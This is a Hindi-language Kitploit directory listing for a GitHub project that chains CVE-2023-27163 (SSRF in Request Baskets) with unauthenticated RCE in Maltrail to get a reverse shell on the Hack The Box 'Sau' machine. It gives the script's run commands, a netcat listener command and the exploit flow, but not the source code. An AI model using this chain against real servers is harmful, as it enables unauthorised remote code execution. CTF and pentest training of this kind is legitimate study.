Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
htb-sau-exploit-chain — HTB Sau के लिए स्वचालित एक्सप्लॉइट चेन — CVE-2023-27163 (SSRF) + Maltrail बिना प्रमाणीकरण वाला RCE → रिवर्स शेल | Kitploit
उपकरण/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

HTB Sau के लिए स्वचालित एक्सप्लॉइट चेन — CVE-2023-27163 (SSRF) + Maltrail बिना प्रमाणीकरण वाला RCE → रिवर्स शेल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

HTB Sau एक्सप्लॉइट चेन — CVE-2023-27163 (SSRF) + Maltrail RCE स्वचालन

एक Python एक्सप्लॉइट स्क्रिप्ट जो CVE-2023-27163 (Request Baskets ≤ 1.2.1 में सर्वर-साइड रिक्वेस्ट फोर्जरी) को Maltrail 0.53 में बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता के साथ जोड़ती है, और रिवर्स शेल प्रदान करती है। Hack The Box Sau मशीन के लिए डिज़ाइन की गई।


📌 अवलोकन

यह स्क्रिप्ट लक्ष्य पर प्रारंभिक पहुंच प्राप्त करने के लिए आवश्यक एक्सप्लॉइटेशन पथ को स्वचालित करती है:

  1. उपयोग योग्य बकेट एंडपॉइंट प्राप्त करने के लिए CVE-2023-27163 का शोषण करना
  2. Maltrail के साथ इंटरैक्ट करने के लिए उजागर सेवा का लाभ उठाना
  3. Maltrail में बिना प्रमाणीकरण वाला RCE ट्रिगर करना
  4. हमलावर मशीन पर रिवर्स शेल प्रदान करना

⚙️ उपयोग

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

उदाहरण:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Netcat लिसनर (महत्वपूर्ण)

एक्सप्लॉइट चलाने से पहले, रिवर्स शेल को पकड़ने के लिए अपनी मशीन पर एक लिसनर शुरू करें:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

उदाहरण:

root@kitploit:~
nc -lvnp 4444

🧩 पैरामीटर

पैरामीटरविवरण
TARGET_URLलक्ष्य का बेस URL (जैसे, http://IP)
LISTENER_IPआपकी हमलावर मशीन का IP
LISTENER_PORTरिवर्स शेल प्राप्त करने के लिए पोर्ट

🚀 एक्सप्लॉइट प्रवाह

  • लक्ष्य URL को नॉर्मलाइज़ करें
  • रिक्वेस्ट बास्केट बनाने/एक्सेस करने के लिए CVE-2023-27163 ट्रिगर करें
  • सुलभ एंडपॉइंट (bucket_url) निकालें
  • Maltrail के साथ इंटरैक्ट करने के लिए बकेट का उपयोग करें
  • रिवर्स शेल उत्पन्न करने के लिए पेलोड निष्पादित करें

⚠️ नोट्स

  • सुनिश्चित करें कि स्क्रिप्ट निष्पादित करने से पहले आपका लिसनर चल रहा है
  • लक्ष्य URL से अंतिम / हटाएँ (स्क्रिप्ट में स्वचालित रूप से संभाला जाता है)
  • विशेष रूप से HTB Sau मशीन के लिए डिज़ाइन की गई है — सामान्य रूप से लागू नहीं हो सकती

📚 संदर्भ

  • CVE-2023-27163 (Request Baskets)
  • Maltrail बिना प्रमाणीकरण वाला RCE

🛑 अस्वीकरण

यह परियोजना शैक्षिक उद्देश्यों और Hack The Box जैसे अधिकृत वातावरणों में उपयोग के लिए है। उचित अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

टूल डाउनलोड करें